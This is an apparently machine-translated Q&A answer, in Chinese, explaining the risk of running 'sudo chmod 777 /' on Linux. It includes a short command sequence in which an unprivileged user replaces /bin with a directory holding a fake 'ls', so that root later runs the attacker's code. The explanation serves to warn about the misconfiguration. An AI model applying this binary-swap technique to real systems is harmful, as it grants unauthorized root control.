Jam*_*mie 2 linux security ubuntu
即sudo chmod /,不是sudo chmod -r /。
攻击者可以访问什么?这对个人机器好吗?
攻击者(非特权用户)将能够在根目录中创建新目录和文件,并将其中的任何现有目录重命名/(例如,将其重命名为有效地使机器无法使用的随机值)。
结合它允许非特权用户用他们自己的内容替换现有目录。想/bin。第一的:
sudo chmod 777 /
现在攻击者(非特权用户)部分:
cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin
现在检查这个:
sudo -i
ls
它有效地为攻击者提供了一种拥有机器的简单方法。
| 归档时间: |
|
| 查看次数: |
788 次 |
| 最近记录: |